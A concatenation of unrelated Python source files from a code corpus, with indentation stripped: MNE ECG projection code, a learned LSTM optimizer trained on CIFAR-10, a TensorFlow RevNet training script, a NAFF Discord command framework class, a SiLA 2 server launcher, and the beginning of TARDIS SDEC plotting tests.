ecg_proj_fname = prefix + '_ecg_avg-proj.fif'
else:
ecg_proj_fname = prefix + '_ecg-proj.fif'
raw = mne.io.read_raw_fif(raw_in, preload=preload)
if raw_event_fname is not None:
raw_event = mne.io.read_raw_fif(raw_event_fname)
else:
raw_event = raw
flat = None # XXX : not exposed to the user
projs, events = mne.preprocessing.compute_proj_ecg(
raw, raw_event, tmin, tmax, n_grad, n_mag, n_eeg, l_freq, h_freq,
average, filter_length, n_jobs, ch_name, reject, flat, bads, avg_ref,
no_proj, event_id, ecg_l_freq, ecg_h_freq, tstart, qrs_threshold,
copy=False)
raw.close()
if raw_event_fname is not None:
raw_event.close()
if proj_fname is not None:
print('Including SSP projections from : %s' % proj_fname)
# append the ecg projs, so they are last in the list
projs = mne.read_proj(proj_fname) + projs
if isinstance(preload, str) and os.path.exists(preload):
os.remove(preload)
print("Writing ECG projections in %s" % ecg_proj_fname)
mne.write_proj(ecg_proj_fname, projs)
print("Writing ECG events in %s" % ecg_event_fname)
mne.write_events(ecg_event_fname, events)
mne.utils.run_command_if_main()
|
the-stack_0_12405 | """This module is to declare global objects."""
from datetime import datetime
# Configuration Options
global moesif_options
moesif_options = {}
# Debug Flag
global DEBUG
DEBUG = True
# Patch Flag
global MOESIF_PATCH
MOESIF_PATCH = False
# MoesifAPI Client
global api_client
api_client = None
# App Config class
global app_config
app_config = None
# App Config
global config
config = None
# App Config sampling percentage
global sampling_percentage
sampling_percentage = 100
# App Config eTag
global config_etag
config_etag = None
# App Config last updated time
global last_updated_time
last_updated_time = datetime.utcnow()
|
the-stack_0_12407 | import glob
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.autograd as autograd
import torch.optim as optim
from torch.autograd import Variable
import matplotlib.pyplot as plt
import random
from tqdm import tqdm
import multiprocessing
import os.path
import csv
import copy
import joblib
from torchvision import datasets
import torchvision
import seaborn as sns; sns.set(color_codes=True)
sns.set_style("white")
from pdb import set_trace as bp
USE_CUDA = torch.cuda.is_available()
def w(v):
if USE_CUDA:
return v.cuda()
return v
cache = joblib.Memory(location='_cache', verbose=0)
from meta_module import *
class OptimizerOneLayer(nn.Module):
def __init__(self, preproc=False, hidden_sz=10, preproc_factor=10.0):
super().__init__()
self.hidden_sz = hidden_sz
if preproc:
self.recurs = nn.LSTMCell(2, hidden_sz)
else:
self.recurs = nn.LSTMCell(1, hidden_sz)
self.output = nn.Linear(hidden_sz, 1)
self.preproc = preproc
self.preproc_factor = preproc_factor
self.preproc_threshold = np.exp(-preproc_factor)
def forward(self, inp, hidden, cell):
if self.preproc:
inp = inp.data
inp2 = w(torch.zeros(inp.size()[0], 2))
keep_grads = (torch.abs(inp) >= self.preproc_threshold).squeeze()
inp2[:, 0][keep_grads] = (torch.log(torch.abs(inp[keep_grads]) + 1e-8) / self.preproc_factor).squeeze()
inp2[:, 1][keep_grads] = torch.sign(inp[keep_grads]).squeeze()
inp2[:, 0][~keep_grads] = -1
inp2[:, 1][~keep_grads] = (float(np.exp(self.preproc_factor)) * inp[~keep_grads]).squeeze()
inp = w(Variable(inp2))
hidden0, cell0 = self.recurs(inp, (hidden[0], cell[0]))
#hidden1, cell1 = self.recurs2(hidden0, (hidden[1], cell[1]))
return self.output(hidden0), (hidden0, ), (cell0, )
def detach_var(v):
var = w(Variable(v.data, requires_grad=True))
var.retain_grad()
return var
import functools
def rsetattr(obj, attr, val):
pre, _, post = attr.rpartition('.')
return setattr(rgetattr(obj, pre) if pre else obj, post, val)
# using wonder's beautiful simplification: https://stackoverflow.com/questions/31174295/getattr-and-setattr-on-nested-objects/31174427?noredirect=1#comment86638618_31174427
def rgetattr(obj, attr, *args):
def _getattr(obj, attr):
return getattr(obj, attr, *args)
return functools.reduce(_getattr, [obj] + attr.split('.'))
def do_fit(opt_net, meta_opt, target_cls, target_to_opt, unroll, optim_it, n_epochs, out_mul, should_train=True):
if should_train:
opt_net.train()
else:
opt_net.eval()
unroll = 1
target = target_cls(training=should_train)
optimizee = w(target_to_opt())
n_params = 0
for name, p in optimizee.all_named_parameters():
n_params += int(np.prod(p.size()))
hidden_states = [w(Variable(torch.zeros(n_params, opt_net.hidden_sz))) for _ in range(2)]
cell_states = [w(Variable(torch.zeros(n_params, opt_net.hidden_sz))) for _ in range(2)]
all_losses_ever = []
if should_train:
meta_opt.zero_grad()
all_losses = None
for iteration in range(1, optim_it + 1):
loss = optimizee(target)
if all_losses is None:
all_losses = loss
else:
all_losses += loss
all_losses_ever.append(loss.data.cpu().numpy())
loss.backward(retain_graph=should_train)
offset = 0
result_params = {}
hidden_states2 = [w(Variable(torch.zeros(n_params, opt_net.hidden_sz))) for _ in range(2)]
cell_states2 = [w(Variable(torch.zeros(n_params, opt_net.hidden_sz))) for _ in range(2)]
for name, p in optimizee.all_named_parameters():
cur_sz = int(np.prod(p.size()))
# We do this so the gradients are disconnected from the graph but we still get
# gradients from the rest
if p.grad is not None:
gradients = detach_var(p.grad.view(cur_sz, 1))
updates, new_hidden, new_cell = opt_net(
gradients,
[h[offset:offset+cur_sz] for h in hidden_states],
[c[offset:offset+cur_sz] for c in cell_states]
)
for i in range(len(new_hidden)):
hidden_states2[i][offset:offset+cur_sz] = new_hidden[i]
cell_states2[i][offset:offset+cur_sz] = new_cell[i]
result_params[name] = p + updates.view(*p.size()) * out_mul
result_params[name].retain_grad()
else:
result_params[name] = p
result_params[name].retain_grad()
offset += cur_sz
if iteration % unroll == 0:
if should_train:
meta_opt.zero_grad()
all_losses.backward()
meta_opt.step()
all_losses = None
optimizee = w(target_to_opt())
optimizee.load_state_dict(result_params)
optimizee.zero_grad()
hidden_states = [detach_var(v) for v in hidden_states2]
cell_states = [detach_var(v) for v in cell_states2]
else:
for name, p in optimizee.all_named_parameters():
rsetattr(optimizee, name, result_params[name])
assert len(list(optimizee.all_named_parameters()))
hidden_states = hidden_states2
cell_states = cell_states2
return all_losses_ever
@cache.cache
def fit_optimizer(target_cls, target_to_opt, preproc=False, unroll=20, optim_it=100, n_epochs=20, n_tests=100, lr=0.001, out_mul=1.0, test_target=None):
opt_net = w(OptimizerOneLayer(preproc=preproc))
meta_opt = optim.Adam(opt_net.parameters(), lr=lr)
best_net = None
best_loss = 100000000000000000
for _ in tqdm(range(n_epochs)):
'''
print("train")
for _ in tqdm(range(20)):
do_fit(opt_net, meta_opt, target_cls, target_to_opt, unroll, optim_it, n_epochs, out_mul, should_train=True)
'''
if test_target is not None:
loss = (np.mean([
np.sum(do_fit(opt_net, meta_opt, target_cls, test_target, unroll, optim_it, n_epochs, out_mul, should_train=False))
for _ in tqdm(range(1))
]))
else:
loss = (np.mean([
np.sum(do_fit(opt_net, meta_opt, target_cls, target_to_opt, unroll, optim_it, n_epochs, out_mul, should_train=False))
for _ in tqdm(range(1))
]))
print(loss)
if loss < best_loss:
print(best_loss, loss)
best_loss = loss
best_net = copy.deepcopy(opt_net.state_dict())
return best_loss, best_net
class CIFAR10Loss:
def __init__(self, training=True):
dataset = datasets.CIFAR10(
'./data/CIFAR10', train=True, download=True,
transform=torchvision.transforms.Compose([
torchvision.transforms.ToTensor(),
torchvision.transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))
])
)
indices = list(range(len(dataset)))
np.random.RandomState(10).shuffle(indices)
if training:
indices = indices[:len(indices) // 2]
else:
indices = indices[len(indices) // 2:]
self.loader = torch.utils.data.DataLoader(
dataset, batch_size=128,
sampler=torch.utils.data.sampler.SubsetRandomSampler(indices))
self.batches = []
self.cur_batch = 0
def sample(self):
if self.cur_batch >= len(self.batches):
self.batches = []
self.cur_batch = 0
for b in self.loader:
self.batches.append(b)
batch = self.batches[self.cur_batch]
self.cur_batch += 1
return batch
class CIFAR10Net(MetaModule):
def __init__(self, layer_size=20, n_layers=1, **kwargs):
super().__init__()
inp_size = 3 * 32 * 32
self.layers = {}
for i in range(n_layers):
self.layers[f'mat_{i}'] = MetaLinear(inp_size, layer_size)
inp_size = layer_size
self.layers['final_mat'] = MetaLinear(inp_size, 10)
self.layers = nn.ModuleDict(self.layers)
self.activation = nn.Sigmoid()
self.loss = nn.NLLLoss()
def all_named_parameters(self):
return [(k, v) for k, v in self.named_parameters()]
def forward(self, loss):
inp, out = loss.sample()
inp = w(Variable(inp.view(inp.size()[0], 3*32*32)))
out = w(Variable(out))
cur_layer = 0
while f'mat_{cur_layer}' in self.layers:
inp = self.activation(self.layers[f'mat_{cur_layer}'](inp))
cur_layer += 1
inp = F.log_softmax(self.layers['final_mat'](inp), dim=1)
l = self.loss(inp, out)
return l
from resnet_meta import resnet50
class CIFAR10ResNet(MetaModule):
def __init__(self):
super().__init__()
self.net = resnet50()
self.loss = nn.CrossEntropyLoss()
def all_named_parameters(self):
return [(k, v) for k, v in self.named_parameters()]
def forward(self, loss):
inp, out = loss.sample()
inp = w(Variable(inp.view(inp.size()[0], 3, 32, 32)))
out = w(Variable(out))
inp = self.net(inp)
l = self.loss(inp, out)
return l
loss, CIFAR10_optimizer = fit_optimizer(CIFAR10Loss, CIFAR10Net, lr=0.01, n_epochs=50, n_tests=20, out_mul=0.1, preproc=True, test_target=CIFAR10ResNet)
print(loss) |
the-stack_0_12409 | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Eager execution workflow with RevNet train on CIFAR-10."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
from absl import flags
import tensorflow as tf
from tensorflow.contrib.eager.python.examples.revnet import cifar_input
from tensorflow.contrib.eager.python.examples.revnet import config as config_
from tensorflow.contrib.eager.python.examples.revnet import revnet
tfe = tf.contrib.eager
def main(_):
"""Eager execution workflow with RevNet trained on CIFAR-10."""
tf.enable_eager_execution()
config = get_config(config_name=FLAGS.config, dataset=FLAGS.dataset)
ds_train, ds_train_one_shot, ds_validation, ds_test = get_datasets(
data_dir=FLAGS.data_dir, config=config)
model = revnet.RevNet(config=config)
global_step = tf.train.get_or_create_global_step() # Ensure correct summary
global_step.assign(1)
learning_rate = tf.train.piecewise_constant(
global_step, config.lr_decay_steps, config.lr_list)
optimizer = tf.train.MomentumOptimizer(
learning_rate, momentum=config.momentum)
checkpointer = tf.train.Checkpoint(
optimizer=optimizer, model=model, optimizer_step=global_step)
if FLAGS.train_dir:
summary_writer = tf.contrib.summary.create_file_writer(FLAGS.train_dir)
if FLAGS.restore:
latest_path = tf.train.latest_checkpoint(FLAGS.train_dir)
checkpointer.restore(latest_path)
print("Restored latest checkpoint at path:\"{}\" "
"with global_step: {}".format(latest_path, global_step.numpy()))
sys.stdout.flush()
for x, y in ds_train:
train_one_iter(model, x, y, optimizer, global_step=global_step)
if global_step.numpy() % config.log_every == 0:
it_test = ds_test.make_one_shot_iterator()
acc_test, loss_test = evaluate(model, it_test)
if FLAGS.validate:
it_train = ds_train_one_shot.make_one_shot_iterator()
it_validation = ds_validation.make_one_shot_iterator()
acc_train, loss_train = evaluate(model, it_train)
acc_validation, loss_validation = evaluate(model, it_validation)
print("Iter {}, "
"training set accuracy {:.4f}, loss {:.4f}; "
"validation set accuracy {:.4f}, loss {:4.f}"
"test accuracy {:.4f}, loss {:.4f}".format(
global_step.numpy(), acc_train, loss_train, acc_validation,
loss_validation, acc_test, loss_test))
else:
print("Iter {}, test accuracy {:.4f}, loss {:.4f}".format(
global_step.numpy(), acc_test, loss_test))
sys.stdout.flush()
if FLAGS.train_dir:
with summary_writer.as_default():
with tf.contrib.summary.always_record_summaries():
tf.contrib.summary.scalar("Training accuracy", acc_train)
tf.contrib.summary.scalar("Test accuracy", acc_test)
tf.contrib.summary.scalar("Training loss", loss_train)
tf.contrib.summary.scalar("Test loss", loss_test)
if FLAGS.validate:
tf.contrib.summary.scalar("Validation accuracy", acc_validation)
tf.contrib.summary.scalar("Validation loss", loss_validation)
if global_step.numpy() % config.save_every == 0 and FLAGS.train_dir:
saved_path = checkpointer.save(
file_prefix=os.path.join(FLAGS.train_dir, "ckpt"))
print("Saved checkpoint at path: \"{}\" "
"with global_step: {}".format(saved_path, global_step.numpy()))
sys.stdout.flush()
def get_config(config_name="revnet-38", dataset="cifar-10"):
"""Return configuration."""
print("Config: {}".format(config_name))
sys.stdout.flush()
config = {
"revnet-38": config_.get_hparams_cifar_38(),
"revnet-110": config_.get_hparams_cifar_110(),
"revnet-164": config_.get_hparams_cifar_164(),
}[config_name]
if dataset == "cifar-10":
config.add_hparam("n_classes", 10)
config.add_hparam("dataset", "cifar-10")
else:
config.add_hparam("n_classes", 100)
config.add_hparam("dataset", "cifar-100")
return config
def get_datasets(data_dir, config):
"""Return dataset."""
if data_dir is None:
raise ValueError("No supplied data directory")
if not os.path.exists(data_dir):
raise ValueError("Data directory {} does not exist".format(data_dir))
if config.dataset not in ["cifar-10", "cifar-100"]:
raise ValueError("Unknown dataset {}".format(config.dataset))
print("Training on {} dataset.".format(config.dataset))
sys.stdout.flush()
data_dir = os.path.join(data_dir, config.dataset)
if FLAGS.validate:
# 40k Training set
ds_train = cifar_input.get_ds_from_tfrecords(
data_dir=data_dir,
split="train",
data_aug=True,
batch_size=config.batch_size,
epochs=config.epochs,
shuffle=config.shuffle,
data_format=config.data_format,
dtype=config.dtype,
prefetch=config.batch_size)
# 10k Training set
ds_validation = cifar_input.get_ds_from_tfrecords(
data_dir=data_dir,
split="validation",
data_aug=False,
batch_size=config.eval_batch_size,
epochs=1,
shuffle=False,
data_format=config.data_format,
dtype=config.dtype,
prefetch=config.eval_batch_size)
else:
# 50k Training set
ds_train = cifar_input.get_ds_from_tfrecords(
data_dir=data_dir,
split="train_all",
data_aug=True,
batch_size=config.batch_size,
epochs=config.epochs,
shuffle=config.shuffle,
data_format=config.data_format,
dtype=config.dtype,
prefetch=config.batch_size)
ds_validation = None
# Always compute loss and accuracy on whole test set
ds_train_one_shot = cifar_input.get_ds_from_tfrecords(
data_dir=data_dir,
split="train_all",
data_aug=False,
batch_size=config.eval_batch_size,
epochs=1,
shuffle=False,
data_format=config.data_format,
dtype=config.dtype,
prefetch=config.eval_batch_size)
ds_test = cifar_input.get_ds_from_tfrecords(
data_dir=data_dir,
split="test",
data_aug=False,
batch_size=config.eval_batch_size,
epochs=1,
shuffle=False,
data_format=config.data_format,
dtype=config.dtype,
prefetch=config.eval_batch_size)
return ds_train, ds_train_one_shot, ds_validation, ds_test
def train_one_iter(model, inputs, labels, optimizer, global_step=None):
"""Train for one iteration."""
grads, vars_, logits, loss = model.compute_gradients(
inputs, labels, training=True)
optimizer.apply_gradients(zip(grads, vars_), global_step=global_step)
return logits, loss
def evaluate(model, iterator):
"""Compute accuracy with the given dataset iterator."""
mean_loss = tfe.metrics.Mean()
accuracy = tfe.metrics.Accuracy()
for x, y in iterator:
logits, _ = model(x, training=False)
loss = model.compute_loss(logits=logits, labels=y)
accuracy(
labels=tf.cast(y, tf.int64),
predictions=tf.argmax(logits, axis=1, output_type=tf.int64))
mean_loss(loss)
return accuracy.result().numpy(), mean_loss.result().numpy()
if __name__ == "__main__":
flags.DEFINE_string(
"data_dir", default=None, help="Directory to load tfrecords")
flags.DEFINE_string(
"train_dir",
default=None,
help="[Optional] Directory to store the training information")
flags.DEFINE_boolean(
"restore",
default=False,
help="[Optional] Restore the latest checkpoint from `train_dir` if True")
flags.DEFINE_boolean(
"validate",
default=False,
help="[Optional] Use the validation set or not for hyperparameter search")
flags.DEFINE_string(
"dataset",
default="cifar-10",
help="[Optional] The dataset used; either `cifar-10` or `cifar-100`")
flags.DEFINE_string(
"config",
default="revnet-38",
help="[Optional] Architecture of network. "
"Other options include `revnet-110` and `revnet-164`")
FLAGS = flags.FLAGS
tf.app.run(main)
|
the-stack_0_12411 | from __future__ import annotations
import asyncio
import copy
import functools
import logging
import re
import typing
from typing import Annotated, Awaitable, Callable, Coroutine, Optional, Tuple, Any, TYPE_CHECKING
from naff.client.const import MISSING, logger_name
from naff.client.errors import CommandOnCooldown, CommandCheckFailure, MaxConcurrencyReached
from naff.client.mixins.serialization import DictSerializationMixin
from naff.client.utils.attr_utils import define, field, docs
from naff.client.utils.misc_utils import get_parameters, get_object_name, maybe_coroutine
from naff.client.utils.serializer import no_export_meta
from naff.models.naff.cooldowns import Cooldown, Buckets, MaxConcurrency
from naff.models.naff.protocols import Converter
if TYPE_CHECKING:
from naff.models.naff.context import Context
__all__ = ("BaseCommand", "check", "cooldown", "max_concurrency")
log = logging.getLogger(logger_name)
kwargs_reg = re.compile(r"^\*\*\w")
args_reg = re.compile(r"^\*\w")
@define()
class BaseCommand(DictSerializationMixin):
"""
An object all commands inherit from. Outlines the basic structure of a command, and handles checks.
Attributes:
extension: The extension this command belongs to.
enabled: Whether this command is enabled
checks: Any checks that must be run before this command can be run
callback: The coroutine to be called for this command
error_callback: The coroutine to be called when an error occurs
pre_run_callback: A coroutine to be called before this command is run **but** after the checks
post_run_callback: A coroutine to be called after this command has run
"""
extension: Any = field(default=None, metadata=docs("The extension this command belongs to") | no_export_meta)
enabled: bool = field(default=True, metadata=docs("Whether this can be run at all") | no_export_meta)
checks: list = field(
factory=list, metadata=docs("Any checks that must be *checked* before the command can run") | no_export_meta
)
cooldown: Cooldown = field(
default=MISSING, metadata=docs("An optional cooldown to apply to the command") | no_export_meta
)
max_concurrency: MaxConcurrency = field(
default=MISSING,
metadata=docs("An optional maximum number of concurrent instances to apply to the command") | no_export_meta,
)
callback: Callable[..., Coroutine] = field(
default=None, metadata=docs("The coroutine to be called for this command") | no_export_meta
)
error_callback: Callable[..., Coroutine] = field(
default=None, metadata=no_export_meta | docs("The coroutine to be called when an error occurs")
)
pre_run_callback: Callable[..., Coroutine] = field(
default=None,
metadata=no_export_meta
| docs("The coroutine to be called before the command is executed, **but** after the checks"),
)
post_run_callback: Callable[..., Coroutine] = field(
default=None, metadata=no_export_meta | docs("The coroutine to be called after the command has executed")
)
def __attrs_post_init__(self) -> None:
if self.callback is not None:
if hasattr(self.callback, "checks"):
self.checks += self.callback.checks
if hasattr(self.callback, "cooldown"):
self.cooldown = self.callback.cooldown
if hasattr(self.callback, "max_concurrency"):
self.max_concurrency = self.callback.max_concurrency
def __hash__(self) -> int:
return id(self)
async def __call__(self, context: "Context", *args, **kwargs) -> None:
"""
Calls this command.
Args:
context: The context of this command
args: Any
kwargs: Any
"""
# signals if a semaphore has been acquired, for exception handling
# if present assume one will be acquired
max_conc_acquired = self.max_concurrency is not MISSING
try:
if await self._can_run(context):
if self.pre_run_callback is not None:
await self.pre_run_callback(context, *args, **kwargs)
if self.extension is not None and self.extension.extension_prerun:
for prerun in self.extension.extension_prerun:
await prerun(context, *args, **kwargs)
await self.call_callback(self.callback, context)
if self.post_run_callback is not None:
await self.post_run_callback(context, *args, **kwargs)
if self.extension is not None and self.extension.extension_postrun:
for postrun in self.extension.extension_postrun:
await postrun(context, *args, **kwargs)
except Exception as e:
# if a MaxConcurrencyReached-exception is raised a connection was never acquired
max_conc_acquired = not isinstance(e, MaxConcurrencyReached)
if self.error_callback:
await self.error_callback(e, context, *args, **kwargs)
elif self.extension and self.extension.extension_error:
await self.extension.extension_error(context, *args, **kwargs)
else:
raise
finally:
if self.max_concurrency is not MISSING and max_conc_acquired:
await self.max_concurrency.release(context)
@staticmethod
def _get_converter_function(anno: type[Converter] | Converter, name: str) -> Callable[[Context, str], Any]:
num_params = len(get_parameters(anno.convert))
# if we have three parameters for the function, it's likely it has a self parameter
# so we need to get rid of it by initing - typehinting hates this, btw!
# the below line will error out if we aren't supposed to init it, so that works out
try:
actual_anno: Converter = anno() if num_params == 3 else anno # type: ignore
except TypeError:
raise ValueError(
f"{get_object_name(anno)} for {name} is invalid: converters must have exactly 2 arguments."
) from None
# we can only get to this point while having three params if we successfully inited
if num_params == 3:
num_params -= 1
if num_params != 2:
raise ValueError(
f"{get_object_name(anno)} for {name} is invalid: converters must have exactly 2 arguments."
)
return actual_anno.convert
async def try_convert(self, converter: Optional[Callable], context: "Context", value: Any) -> Any:
if converter is None:
return value
return await maybe_coroutine(converter, context, value)
def param_config(self, annotation: Any, name: str) -> Tuple[Callable, Optional[dict]]:
# This thing is complicated. NAFF-annotations can either be annotated directly, or they can be annotated with Annotated[str, CMD_*]
# This helper function handles both cases, and returns a tuple of the converter and its config (if any)
if annotation is None:
return None
if typing.get_origin(annotation) is Annotated and (args := typing.get_args(annotation)):
for ann in args:
v = getattr(ann, name, None)
if v is not None:
return (ann, v)
return (annotation, getattr(annotation, name, None))
async def call_callback(self, callback: Callable, context: "Context") -> None:
callback = functools.partial(callback, context) # first param must be ctx
parameters = get_parameters(callback)
args = []
kwargs = {}
if len(parameters) == 0:
# if no params, user only wants context
return await callback()
c_args = copy.copy(context.args)
for param in parameters.values():
if isinstance(param.annotation, Converter):
# for any future dev looking at this:
# this checks if the class here has a convert function
# it does NOT check if the annotation is actually a subclass of Converter
# this is an intended behavior for Protocols with the runtime_checkable decorator
convert = functools.partial(
self.try_convert, self._get_converter_function(param.annotation, param.name), context
)
else:
convert = functools.partial(self.try_convert, None, context)
func, config = self.param_config(param.annotation, "_annotation_dat")
if config:
# if user has used an naff-annotation, run the annotation, and pass the result to the user
local = {"context": context, "extension": self.extension, "param": param.name}
ano_args = [local[c] for c in config["args"]]
if param.kind != param.POSITIONAL_ONLY:
kwargs[param.name] = func(*ano_args)
else:
args.append(func(*ano_args))
continue
elif param.name in context.kwargs:
# if parameter is in kwargs, user obviously wants it, pass it
if param.kind != param.POSITIONAL_ONLY:
kwargs[param.name] = await convert(context.kwargs[param.name])
else:
args.append(await convert(context.kwargs[param.name]))
if context.kwargs[param.name] in c_args:
c_args.remove(context.kwargs[param.name])
elif param.default is not param.empty:
kwargs[param.name] = param.default
else:
if not str(param).startswith("*"):
if param.kind != param.KEYWORD_ONLY:
try:
args.append(await convert(c_args.pop(0)))
except IndexError:
raise ValueError(
f"{context.invoke_target} expects {len([p for p in parameters.values() if p.default is p.empty]) + len(callback.args)}"
f" arguments but received {len(context.args)} instead"
) from None
else:
raise ValueError(f"Unable to resolve argument: {param.name}")
if any(kwargs_reg.match(str(param)) for param in parameters.values()):
# if user has `**kwargs` pass all remaining kwargs
kwargs = kwargs | {k: v for k, v in context.kwargs.items() if k not in kwargs}
if any(args_reg.match(str(param)) for param in parameters.values()):
# user has `*args` pass all remaining args
args = args + [await convert(c) for c in c_args]
return await callback(*args, **kwargs)
async def _can_run(self, context: Context) -> bool:
"""
Determines if this command can be run.
Args:
context: The context of the command
"""
max_conc_acquired = False # signals if a semaphore has been acquired, for exception handling
try:
if not self.enabled:
return False
for _c in self.checks:
if not await _c(context):
raise CommandCheckFailure(self, _c, context)
if self.extension and self.extension.extension_checks:
for _c in self.extension.extension_checks:
if not await _c(context):
raise CommandCheckFailure(self, _c, context)
if self.max_concurrency is not MISSING:
if not await self.max_concurrency.acquire(context):
raise MaxConcurrencyReached(self, self.max_concurrency)
if self.cooldown is not MISSING:
if not await self.cooldown.acquire_token(context):
raise CommandOnCooldown(self, await self.cooldown.get_cooldown(context))
return True
except Exception:
if max_conc_acquired:
await self.max_concurrency.release(context)
raise
def error(self, call: Callable[..., Coroutine]) -> Callable[..., Coroutine]:
"""A decorator to declare a coroutine as one that will be run upon an error."""
if not asyncio.iscoroutinefunction(call):
raise TypeError("Error handler must be coroutine")
self.error_callback = call
return call
def pre_run(self, call: Callable[..., Coroutine]) -> Callable[..., Coroutine]:
"""A decorator to declare a coroutine as one that will be run before the command."""
if not asyncio.iscoroutinefunction(call):
raise TypeError("pre_run must be coroutine")
self.pre_run_callback = call
return call
def post_run(self, call: Callable[..., Coroutine]) -> Callable[..., Coroutine]:
"""A decorator to declare a coroutine as one that will be run after the command has."""
if not asyncio.iscoroutinefunction(call):
raise TypeError("post_run must be coroutine")
self.post_run_callback = call
return call
def check(check: Callable[["Context"], Awaitable[bool]]) -> Callable[[Coroutine], Coroutine]:
"""
Add a check to a command.
Args:
check: A coroutine as a check for this command
"""
def wrapper(coro: Coroutine) -> Coroutine:
if isinstance(coro, BaseCommand):
coro.checks.append(check)
return coro
if not hasattr(coro, "checks"):
coro.checks = []
coro.checks.append(check)
return coro
return wrapper
def cooldown(bucket: Buckets, rate: int, interval: float) -> Callable[[Coroutine], Coroutine]:
"""
Add a cooldown to a command.
Args:
bucket: The bucket used to track cooldowns
rate: How many commands may be ran per interval
interval: How many seconds to wait for a cooldown
"""
def wrapper(coro: Coroutine) -> Coroutine:
cooldown_obj = Cooldown(bucket, rate, interval)
coro.cooldown = cooldown_obj
return coro
return wrapper
def max_concurrency(bucket: Buckets, concurrent: int) -> Callable[[Coroutine], Coroutine]:
"""
Add a maximum number of concurrent instances to the command.
Args:
bucket: The bucket to enforce the maximum within
concurrent: The maximum number of concurrent instances to allow
"""
def wrapper(coro: Coroutine) -> Coroutine:
max_conc = MaxConcurrency(concurrent, bucket)
coro.max_concurrency = max_conc
return coro
return wrapper
|
the-stack_0_12415 | import logging
from argparse import ArgumentParser
from .server import Server
logger = logging.getLogger(__name__)
def parse_args():
parser = ArgumentParser(prog="contiflowpump_service", description="Start this SiLA 2 server")
parser.add_argument("-a", "--ip-address", default="127.0.0.1", help="The IP address (default: '127.0.0.1')")
parser.add_argument("-p", "--port", type=int, default=50052, help="The port (default: 50052)")
parser.add_argument("--disable-discovery", action="store_true", help="Disable SiLA Server Discovery")
log_level_group = parser.add_mutually_exclusive_group()
log_level_group.add_argument("-q", "--quiet", action="store_true", help="Only log errors")
log_level_group.add_argument("-v", "--verbose", action="store_true", help="Enable verbose logging")
log_level_group.add_argument("-d", "--debug", action="store_true", help="Enable debug logging")
return parser.parse_args()
def start_server(args):
server = Server()
try:
server.start_insecure(args.ip_address, args.port, enable_discovery=not args.disable_discovery)
print(f"Server startup complete, running on {args.ip_address}:{args.port}. Press Enter to stop it")
try:
input()
except KeyboardInterrupt:
pass
finally:
server.stop()
print("Stopped server")
def setup_basic_logging(args):
level = logging.WARNING
if args.verbose:
level = logging.INFO
if args.debug:
level = logging.DEBUG
if args.quiet:
level = logging.ERROR
logging.basicConfig(level=level, format="%(asctime)s:%(levelname)s:%(name)s:%(message)s")
if __name__ == "__main__":
args = parse_args()
setup_basic_logging(args)
start_server(args)
|
the-stack_0_12418 | """Tests for SDEC Plots."""
from tardis.base import run_tardis
import pytest
import pandas as pd
import numpy as np
import os
from copy import deepcopy
from tardis.visualization.tools.sdec_plot import SDECData, SDECPlotter
import astropy.units as u
from matplotlib.collections import PolyCollection
from matplotlib.lines import Line2D
import tables
import re
def make_valid_name(testid):
"""
Sanitize pytest IDs to make them valid HDF group names.
Parameters
----------
testid : str
ID to sanitize.
Returns
-------
testid : str
Sanitized ID.
"""
testid = testid.replace("-", "_")
testid = "_" + testid
return testid
@pytest.fixture(scope="module")
def simulation_simple(config_verysimple, atomic_dataset):
"""
Instantiate SDEC plotter using a simple simulation model.
Parameters
----------
config_verysimple : tardis.io.config_reader.Configuration
Configuration object for a very simple simulation.
atomic_dataset : str or tardis.atomic.AtomData
Atomic data.
Returns
-------
sim: tardis.simulation.base.Simulation
Simulation object.
"""
# Setup simulation configuration using config_verysimple and
# override properties in such a way to make the simulation run faster
config_verysimple.montecarlo.iterations = 3
config_verysimple.montecarlo.no_of_packets = 4000
config_verysimple.montecarlo.last_no_of_packets = -1
config_verysimple.spectrum.virtual.virtual_packet_logging = True
config_verysimple.montecarlo.no_of_virtual_packets = 1
config_verysimple.spectrum.num = 2000
atomic_data = deepcopy(atomic_dataset)
sim = run_tardis(
config_verysimple,
atom_data=atomic_data,
show_convergence_plots=False,
)
return sim
@pytest.fixture(scope="module")
def sdec_ref_data_path(tardis_ref_path):
"""
Return the path to the reference data for the SDEC plots.
Parameters
----------
tardis_ref_path : str
Path to the reference data directory.
Returns
-------
str
Path to SDEC reference data.
"""
return os.path.abspath(os.path.join(tardis_ref_path, "sdec_ref.h5"))
class TestSDECPlotter:
"""Test the SDECPlotter class."""
@pytest.fixture(scope="class", autouse=True)
def create_hdf_file(self, request, sdec_ref_data_path):
"""
Create an HDF5 file object.
Parameters
----------
request : _pytest.fixtures.SubRequest
sdec_ref_data_path : str
Path to the reference data for the SDEC plots.
Yields
-------
h5py._hl.files.File
HDF5 file object.
"""
cls = type(self)
if request.config.getoption("--generate-reference"):
cls.hdf_file = tables.open_file(sdec_ref_data_path, "w")
else:
cls.hdf_file = tables.open_file(sdec_ref_data_path, "r")
yield cls.hdf_file
cls.hdf_file.close()
@pytest.fixture(scope="class")
def plotter(self, simulation_simple):
"""
Create a SDECPlotter object.
Parameters
----------
simulation_simple : tardis.simulation.base.Simulation
Simulation object.
Returns
-------
tardis.visualization.tools.sdec_plot.SDECPlotter
"""
return SDECPlotter.from_simulation(simulation_simple)
@pytest.fixture(scope="class")
def observed_spectrum(self):
"""
Return the observed spectrum.
Returns
-------
Tuple of two astropy.units.quantity.Quantity values.
"""
test_data = np.loadtxt(
"tardis/visualization/tools/tests/data/observed_spectrum_test_data.dat"
)
observed_spectrum_wavelength, observed_spectrum_flux = test_data.T
observed_spectrum_wavelength = observed_spectrum_wavelength * u.AA
observed_spectrum_flux = (
observed_spectrum_flux * u.erg / (u.s * u.cm ** 2 * u.AA)
)
return observed_spectrum_wavelength, observed_spectrum_flux
@pytest.mark.parametrize("species", [["Si II", "Ca II", "C", "Fe I-V"]])
def test_parse_species_list(self, request, plotter, species):
"""
Test _parse_species_list method.
Parameters
----------
